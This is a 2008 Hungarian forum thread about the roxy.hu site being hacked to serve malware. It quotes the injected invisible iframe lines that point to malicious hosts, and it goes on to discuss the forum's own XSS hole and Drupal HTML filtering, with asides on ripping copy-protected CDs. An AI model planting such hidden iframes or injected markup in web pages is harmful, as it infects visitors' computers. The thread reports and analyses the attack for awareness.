A www.roxy.hu-t feltörték és malware-t terjeszt

Offtopic

Ilyet is ritkán lát az ember, de legyen ez ékes példa.
Ma délután kedvenc Internet Explorer 6-osommal (igen, üssetek) ellátogattam egy általam eddig biztonságosnak itélt weboldalra a www.roxy.hu -ra. Legnagyobb meglepetésemre azonnal elstartolt a Java Virtual Machine és elkezdett telepedni a mindenség. Persze ilyenkor már mindegy, malware jött, látott és győzött. Mondom mijazisten. Víruskergetőm persze nem volt, ezért spec én vagyok a hibás, de persze úgy igazi a hazárdírozás, ha IE6-tal tűzfal és víruskergető nélkül szörfölget az ember :) Bele is futottam most rendesen. (üssetek megint)

Szóval röpke roxy.hu html forráskód elemezgetés után pikk-pakk kiderült, hogy valaki becsempészett egy csúnya iframe-et a kódba, ami meg persze meghívja a csúnya domain-t, ami meg elkezdi terjeszteni a malware-t.
Ez itt a kód: 


<iframe src="http://allont.net/in.cgi?id10" width=0 height=0 frameborder=0></iframe>

Irtam ekik most egy emailt, meglássuk milyen gyorsan reagálják le a user feedback-et :)
Anno mikor írtam nekik pl hogy meghalt az online rádió stream-jük, kerek másfél hónap alatt pöcre meg is javították :)

( w4rp v | 2008. 09. 16., k – 00:56 )

Ha ez az a roxys rendszergazda, akit mi még ismertünk..
Kölcsönkért pár eredeti magyar opera, és musicalelőadás cd-t, tipikusan nem azok
a magyar torrent tartalmak, hogy ennek de örülne.
Aztán sirva jött vissza, hogy ezek másolásvédettek, mit csináljon.
Aztán mekkora h0xor vagyok, hogy tudok rippelni egy másolásvédett lemezről.. o.O
/3-4 éve/

Mondjuk ez itt nagyon off, de:
"a felvétel másolásvédelemmel ellátva"
Ubul nem is mutatja, nautilus rögtön wav fájlokat listáz, de egy kicsit közelebbről..

warp@arthur:~$ sudo mount -t iso9660 /dev/cdrom /media/cdrom
mount: a(z) /dev/scd0blokkeszköz írásvédett, csatolás csak olvashatóként
warp@arthur:~$ ls /media/cdrom
autorun.inf player UninstallPlayer.exe
MacPlayer.app player.exe UninstallPlayer.txt
warp@arthur:~$ cat /media/cdrom/UninstallPlayer.txt
Several new files are automatically installed on your PC
when listened to for the first time. In order to remove
these newly installed files, please double click on
"UninstallPlayer.exe" file.

Ez az a védelem, ami windows alatt is egy kemény alt-billentyű segítségével kikerülhető.
De amíg van akinek ez is magas, addig megéri ezeket a szarokat rárakni a lemezre.
/Mégoffabb/
Viszont ez semmi a szalagavatónk felvételével megbízott balekhez képest.
Miután ki lett fizetve, néhány hónap késéssel mindenki kézhezkapta a dvd-t, aki rendelt.
Sokan gondolták, hogy inkább nem fizetnek 3500HUFot egy lemezért, inkább másolják a többiekét, 35-ből 22en
ugy is rendeltek, éhen nem halnak.
Az egy dolog, hogy a dvd-menüben el van írva az évszám, a borítót paintel rakta össze, a videó a 3 katasztrofális (karok végtagok, fejek, az állvány meg epilepsziás) kameraállásból kb 320*240be volt továbbítva a gépre, majd erről lett felnagyítva dvd-re, de a következő szöveg a hátoldalon kiverte a biztosítékot:
"A DVD MÁSOLÁSVÉDELMI SZOFTVERT TARTALMAZ, SZÁMÍTÓGÉPBE HELYEZVE VÉGLEGES HARDVERKÁROSODÁST IS OKOZHAT!"
Hacsak nem arra gondolt, hogy az ótvar traxdata korongok felrobbannak a meghajtóban..az égvilágon semmi se volt rajta a dvd struktúrán kívül. De a cd-s másolásvédelmemmel kapcsolatos állításom itt is bejött:
Sokan nem merték berakni a gépbe, egyvalaki pedig váltig állította, hogy furcsa hangokat adott ki a gépe, és "elromlott".
Ugyhogy köszönjük, inkább mégse, perrel fenyegetés végére visszavette az anyagot, és visszaadta a pénzt. Mondjuk nálam megmaradt a felvétel:). Aztán év végére mégis visszajuttatta a lemezeket.
//

ööö, én már találkoztam olyan lemezzel, amit 1x-es sebességnél gyorsabban nem tudtál leolvasni!

ez lenne a másolásvédelem, hogy a ripper programok nagyrésze nekiállna 52x-esen olvasni és úgy nem lehet. de az a lejátszó ami windowsra alapból felmászik az csak 1x-esen olvassa - pont úgy, ahogy az asztali cd olvasó)

persze a cdparanoia 1x-es sebességre korlátozás után gond nélkül megette a lemezt.

( uid_14401 | 2008. 09. 16., k – 01:44 )

Windowsból még van itt néhány, és mondjuk oké... de mi ez az IE6?

-----------------------------
Ubuntu 8.04

( Elbandi v | 2008. 09. 16., k – 03:12 )

hat oregem te sem vagy 100-as... kepes voltal a "virusos" kodot ide is benyomni...

--
A vegtelen ciklus is vegeter egyszer, csak kelloen eros hardver kell hozza!

Ohh bammeg és tényleg :D
Asszem találtunk egy verynice XSS jellegű sérülékenységet itt hup-on, hogy a fórum engedi hogy IFRAME-et berakhassál a hozzászólásba...

Ide most tényleg bármilyen html kódot be lehet tenni? Nem túl veszélyes ez? Elnézést, de itt most elrontom az oldalt :)

Mivel ide csak ellenőrzés után lehet regisztrálni, egy kicsit "több van megengedve" annak érdekében, hogy lehessen bizonyos kódokat is beilleszteni megtárgyalás céllal. Ez nem jelenti azt, hogy ész nélkül kell mindent copy&paste-zni, és főleg nem azt, hogy ellenőrzés és előnézet meg 

[code]

[/code] használata nélkül tartalmakat beilleszteni.

Aki nem tudja ezt megfelelően és ésszel használni, az nem sokáig tagja a HUP közösségnek.

--
trey @ gépház

"Aki nem tudja ezt megfelelően és ésszel használni, az nem sokáig tagja a HUP közösségnek."
Cserebe XSS-el szerez parszaz aktiv accountot, amivel tagja. :)
Mondjuk.. a "megtargyalasi celt" mennyire befolyasolna, ha a < es > jelekbol lt es gt lenne? Ok, nyilvan kell valami BBCode a Youtube video beszurasahoz, de azt hiszem mast nem nagyon erintene. Ez a tr/td gondot is kikuszobolne.

----
Large Hadron Collider :)
honlapkészítés

Szánalmasnak tartanám, ha ilyesmivel kellene foglalkozni itt. Két dolog között lehet választani. Vagy szigorítások, aminek sokan nem fognak örülni, vagy az, hogy kib*szom aki nem tud viselkedni. Az utóbbi nekem szimpatikusabb. Majd megfontolom, hogy bekapcsoljam-e a szigorúbb html szűrést. De ha amiatt lesz sírás-rívás, akkor majd hozzád irányítom az embereket.

--
trey @ gépház

Csak felvetettem, hogy egyaltalan mit ronthat el a szigorubb szures. Ha semmit, akkor szerintem nem lesz siras-rivas.
Ez a hozzaallas amugy kicsit olyan, mint a backup "ugyse romlik el, mar 1 eve mukodik", a security "ugysincs a gepen semmi fontos, miert tornek fel", meg a tobbi hasonlo. A szanalmassal mondjuk egyetertek, de azt vedd figyelembe, hogy a regisztracio lamerszuroje az XSS-kiddie-ket nem biztos, hogy kivedi (felteve, hogy nem freemailes cimmel jonnek).

----
Large Hadron Collider :)
honlapkészítés

hmm...

nade ha a meglévő filtert jogosultságot átállítod más user groupra - amihez már nem fér hozzá a jónép - akkor mivel megmarad a filter, csak beküldeni nem lehet már ilyet, listázáskor nem ront...

aztán csinálsz egy újat mordor filtert és használják azt ... :)

"A very intelligent turtle, found programming UNIX a hurdle
The system, you see ran as slow as did he,And that’s not saying much for the turtle."

én arra gondoltam, hogy a jelenlegi beviteli forma jogosultságát átállítod egy olyan csoportra amibe nem tartoznak bele a csak simán regisztrált felhasználók. (gondolom nem csak anonymous van meg regisztrált, ha ez probléma csinálsz egy újat). Ez nem lesz hatással a rég beküldött tartalmakra

majd csinálsz egy másik új beviteli formát és azt olyan restrictedre állítod meg olyanra konfigurálod amilyen csak akarod, ennek a jogosultságát meg megkapják a regisztrált felhasználók.

"A very intelligent turtle, found programming UNIX a hurdle
The system, you see ran as slow as did he,And that’s not saying much for the turtle."

A Drupal az output-on szűr. Ha a regisztrált felhasználók szigorúbb filtert kapnak, az a régi tartalmakra kihat. Ha most beállítok egy olyan filtert, amiből kiszedem az 

<object>

-et és az 

<embed>

-et, akkor a korábban beillesztette YouTube videók nem fognak megjelenni. Abban az esetben működik amit leírtál, ha azzal egyidőben átállítom az adatbázisban pl. egy

update node_revisions set format="3" where body LIKE "%param name%";

vagy hasonló query-vel az érintett cikkek formáját _is_ arra, hogy a "gyengébb" filteren jöjjön ki. Ezt csináltam / csinálom.

--
trey @ gépház

kedves trey,

éne NEM erről beszélek. Ha van egy filtered (name=TEST FILTER) ami pl engedi a linkeket(< a > és használhatják a regisztrálók egy csoportja( registered users). Ezzel beküldtek tartalmakat.

Csinálsz - tehát teljesen újat készítesz!- egy új filtert (name=NEW TEST FILTER) és ebből kiveszed az engedélyezett tagek közül a linkeket(< a >) majd engedélyezed a a csoportnak(registered useres) hogy ezt használhatják.

A régi filter használatát elveszed a registered useres csoporttól.

Ettől NEM fog változni semmilyen beküldött tartalom. Csak az új tartalmakban nem engedélyezett a link.

De csak a te kedvedért most teszteltem be egy 5.10 es drupalon.

"A very intelligent turtle, found programming UNIX a hurdle
The system, you see ran as slow as did he,And that’s not saying much for the turtle."

Jah. Ez bukik ott, hogy az alapértelmezett filterből nem lehet kivenni senkit. S eddig azzal küldtek be tartalmat a regisztrált userek. Mivel nem lehet kivenni, az mindig érvényes lesz rá. Szóval értem én, hogy mit mondasz, de az itteni sajátosságok miatt muszáj az adatbázison állítani.

--
trey @ gépház

Vagy szigorítások, aminek sokan nem fognak örülni, vagy az, hogy kib*szom aki nem tud viselkedni. Az utóbbi nekem szimpatikusabb.

- cinikusan: 

mplayer "http://www.youtube.com/get_video?video_id=PmzDu-HRukM&t=OEgsToPDskLWTIOOO_IYenL-FgVNLdJp" -ss 02:12 -endpos 00:06

.
- objektíven: Tudtommal a Drupal a hozzászólásaiban nem engedi az iframe-et alapértelmezetten.

_____________________________
Én egy divathupper vagyok. :)

Valószínűleg nem ismered a HUP történelmét. Itt nem Drupal-lal indult az oldal, hanem sok éven keresztül PHPNuke-on futott. Itt a régi tartalmakkal való kompatibilitás megőrzése nem olyan egyszerű, ahogy az elsőre látszik.

De ennek ellenére dolgozom egy megoldáson, ami azonban elég masszív adatbázis update-et igényel a régi Nuke-os cikkek miatt, így előtte le kellene alaposan tesztelni. Ha nem okoz túl nagy kavarodást, akkor elképzelhető, hogy bekapcsolom az olvasóknál a html szűrést. Illetve van egy másik lehetőség is. Megvizsgálom, hogy melyik a jobb.

--
trey @ gépház

De ennek ellenére dolgozom egy megoldáson, ami azonban elég masszív adatbázis update-et igényel a régi Nuke-os cikkek miatt, így előtte le kellene alaposan tesztelni.

Ha nem titok, mi lenne az?

-----
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben."

Először arra gondoltam, hogy egy 


update node_revisions set format="3";

SQL paranccsal átállítom az összes régi cikk (vagy csak az általam írtakat) beviteli formáját. Ezzel elkerülhető lett volna, hogy a régi cikkekből kiszedje a HTML output filter beágyazott a YouTube, stb. tartalmakat. De közben találtam más megoldást.

--
trey @ gépház

Én csak szerettem volna felhívni minimálisan a figyelmet arra, hogy ez így annyira nem egézséges. Okay, hogy itt HUP-on alapjában véve csak a "hozzáértőbb" normális közönség van, aki nem akar rombolni, de bármikor besunnyoghat egy rosszakaró is. Nem akarok itt feltétlenül ötleteket adni, de pl ezzel a bármikor beszúrható IFRAME kóddal speciel láthatatlanul bármikor meg tudnék hívni egy akármilyen weboldalt, példának pl legyen egy saját blog weboldala. Elkezdek mind az őrül kommentelgetni mindenhova itt a fórumban és minden hozzászólásomba elszórom ezt az IFRAME-et, ami a háttérben a saját blogomat hozza be. Ezzel kárt itt nem okozok, viszont megdobom a BLOG-om látogatottságát okosba, mert úgye aki megnéz itt hup-on egy témakört és ott is szerepel az egyik hozzászólásom, akkor ő automatikusan a blog-mat is meg fogja látogatni ezzel, csak nem tud róla a nem látható iframe miatt. De a blogom helyett akár egy TOPLISTA weboldalt is meghívhatnék... sőt, ha nagy szemét akarnék lenni, akkor akár egy popup is megvalósítható lenne.

Szerintem egyébként visszamenőlegesen is kompatibilis lenne az a megoldás, ha a hozzászólások megjelenítésénél egy sima htmlspecialchars()-t ráeresztenél a szövegre mielött kiíratod. Ehhez nem kell adatbázis UPDATE, a megjelenő forráskódok meg így nem lennének közvetlenűl beinjektálva "értelmezhető" kódként a HTML-be.

Tisztában vagyok ezekkel a lehetőségekkel. Emellett - az évek alatt - eddig nem volt szükség arra, hogy ezzel kelljen foglalkozni. Persze mindig jönnek újoncok akik feltalálják a melegvizet. Ezután megfontolom, hogy kell-e. Úgy tűnik, hogy vannak akik miatt kell.

Mindenesetre megjegyzem, hogy nem az normális hozzáállás, hogy szándékosan problémát okozol az oldalban ha problémát találsz, hanem az, hogy jelzed a dolgot az üzemeltetőnek.

--
trey @ gépház

( trey | 2008. 09. 16., k – 07:27 )

"Víruskergetőm persze nem volt, ezért spec én vagyok a hibás, de persze úgy igazi a hazárdírozás, ha IE6-tal tűzfal és víruskergető nélkül szörfölget az ember :)"

Ráadásul - súlyosbításnak - gondolom rendszergazdaként.

--
trey @ gépház

( joachim | 2008. 09. 16., k – 09:18 )

Firefox megmondja: "aszinkron entitás" :) 

XML feldolgozási hiba: aszinkron entitás
Hely: jar:file:///usr/lib/firefox-3.0.1/chrome/browser.jar!
/content/browser/safebrowsing/blockedSite.xhtml
195. sor, 46. oszlop:          
<p id="errorShortDescText_malware">&safeb.blocked.malware.shortDesc;</p>
---------------------------------------------^

Tanulság: ne használj IE-t! (és windozt se lehetőleg.)

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...

( joachim | 2008. 09. 16., k – 09:44 )

Megnéztem a google-ban, hogy mikor írja ki, hogy "aszinkron entitás" és egy az egyben ugyanazt a hibaüzenetet dobta ki másnak is más oldalon:

http://ubuntu.hu/forum/alkalmazasok/hardver-szoftver-gondokkal-kuzdo-ke…

érdekes..

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...

( hawk | 2008. 09. 16., k – 09:46 )

Érdemes azt is meglesni honnan jön a támadás:
....iframe src="http://59.125.229.71/ex/7/index.php....

inetnum: 59.124.0.0 - 59.127.255.255
netname: HINET-NET
country: TW
descr: CHTD, Chunghwa Telecom Co.,Ltd.

Én legszivesebben eljátszadoznék az IP címmel egy kicsit flood ping illetve webszerver stressz teszt erejéig :D

ahogy érzed, hülyeségnek tartom, hiszen:

1) ezzel megfékezni legfeljebb temporárisan tudod, de vélhetően még úgy sem

2) ezzel kárt nem okozol, sőt, vélhetően nem ül a cső másik végén egy user, akinek ezzel fejfájást okozol

3) amennyiben a kódolónak (hadd ne nevezzük már programozónak) volt egy kis esze, akkor még azzal sem érnél sokat, ha odamennél, és lehúznád a gépet a hálózati feszültségről. valószínűleg még 5-600 géppel kéne megcsinálnod ugyanezt

4) ettől nem lesz szebb a világ. több ezer embert és több millió (példány) programot üldözhetnél így teljes szívnyugodtsággal, amik - megjegyzem - gyorsabban terjednek, mint amilyen sebességgel tenni lehet ellenük

5) az ilyen alacsony szintű védelem nem azért gáz, mert ezzel támadási felületet hagysz, amin bejön minden, és szétba×××a a rendszered, hanem azért, mert utána (főleg naiv felhasználók esetében, akik az ilyet észre sem veszik, csak boldogok, hogy most már meg tudnak nézni java formátumú videót is a jutúbon) a te géped már nem csak támadási, hanem támadó felület is egyben. kishal-nagyhal effektus rulez.

6) a drága delikvens észreveszi, hogy szórakozol vele, és dühös lesz, és ugyanezt jobban csinálja, mint te, és te jársz rosszul (volt már ilyenre példa...)

szóval kár digitális messiást játszani. a világ romlott és menthetetlen. használj linuxot.

:: by BRI.
:: config :: Acer TravelMate // Intel Celeron 530 1.73GHz. 533MHz FSB, 1MB L2 // 1GB DDR2 // Mobile Intel GMA X3100 // Ubuntu Hardy

The URL you recently submitted has been accepted as a phishing site by
the Netcraft Anti-Phishing Team.

1. URL:
http://59.125.229.xx/ex/7/index.php

2. URL:
http://xxxxxx.net/1.php

3. URL:
http://xxxxxx.net/in.cgi?id10

Ebből csak a témaindító linkjét küldtem be, reggel.
A másik kettőre Netcrafték találtak, az általuk való blokkolás talán hatásosabb...

Jó dolog ez a toolbar.

--
A gyors gondolat többet ér, mint a gyors mozdulat.

( Dwokfur v | 2008. 09. 16., k – 18:59 )

IE6 firewall és vírusirtó nélkül.
Szerintem be lehetne vezetni scene partykon "www kamikaze" néven ezt az új megmérettetési formát...

"Jegyezze fel a vádhoz - utasította Metcalf őrnagy a tizedest, aki tudott gyorsírni. - Tiszteletlenül beszélt a feljebbvalójával, amikor nem pofázott közbe."

Windowson nagyon anvanced biztonsagi megoldasok vannak am! Ott a tuzfal az nem az iptables+kernel szintu szuro, hanem nagyon sok forgalomelemzo progi is van.
Mondjuk a Kaspersky csinal ilyen virusszuro+tuzfal+minden egyben dolgokat, ami a netes forgalomban is keres. Volt is belole gond, hogy a PHP-ben megirt crawlert megfogta, mert feltette a dragaszagomat az IE6 sebezhetosegektol.

----
Large Hadron Collider :)
honlapkészítés

( bsh | 2008. 09. 17., sze – 09:52 )

még mindig fel van törve? az jó... mert két hete kábé egy csaj ismerősöm laptopjáról alig bírtam levakarni ezt a szart, ami a roxyról jött neki. ezek szerint azóta sem csinálták meg? hát ez remek...!

( zolo | 2008. 09. 17., sze – 11:33 )

"de persze úgy igazi a hazárdírozás"

meg persze admin joggal kell netezgetni, minek is talaltak ki a jogosultsagokat...f@szsag az egesz...

jaj, megint cinikus vagyok :]

( avoros | 2008. 09. 17., sze – 11:39 )

Poén on

Azon gondolkozom, hogy a kolléga által vázolt cselekmény tekinthető-e extrém sportnak?:-)

Még a TB sem támogatja:-)

( hawk | 2008. 09. 18., cs – 09:34 )

És igen! Eltüntették a kódot. 3-4 nap alatt csak sikerült.

( rohamkocka | 2008. 09. 18., cs – 09:46 )

Már rendesen tölt az oldal.
Az egésznek amúgy elég feltűnő jele volt -szerintem ezért is ment ilyen gyorsan-, ugyanis felül mindig van egy sáv, ahol az aktuális zeneszámot írja ki, de napok óta csak az előadót írta ki.

----------------------------------------
"Lehet egy kérdéssel több?" (Egri János)

( tibyke | 2008. 09. 18., cs – 10:10 )

legalabb egy hirben jelezhettek volna a cimlapon ezek az okos roxysok, hogy mi tortent, mik a varhato kovetekzmenyek, ill. megoldasi javaslatokat is vazolhattak volna.
ez lett volna a minimum. szerintem.

t

( joachim | 2008. 09. 18., cs – 11:39 )

Mi van, ha tudtak róla, vagyis direkt rakták fel, hogy adatokat gyűjtsenek a látogatókról?

A malware sokminden lehet... sokmindenre használható.
(Az is lehet, hogy az oldalgazda tudott róla, de a roxy vezetősége nem.)

Azért következtetek erre, mert nem tettek ki figyelmeztetést, hogy aki az elmúlt napokban (hetekben?) meglátogatta az oldalt windozos gépről, 6-os explorert használva, annak nagy valószínűséggel fertőzött lett a gépe.

Minimum, hogy elnézést kérnek és feltesznek egy rövid howto-t, az eltávolításról...
Mivel ezt nem tették meg ismeretlen okból, ezért feltételezem, hogy szándékos volt az egész.

(Nem tudom, hogy ez nem bűncselekmény kategória e?)

Veszi e majd valaki a fáradságot, hogy utánanézzen?
Valószínűleg nem, hacsak valaki el nem küldi a sztorit a valamelyik TV-nek, bulvárlapnak, stb, vagy a konkurens rádiók valamelyikének. :)

(én nem fogom, mert magasról teszek rá)

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...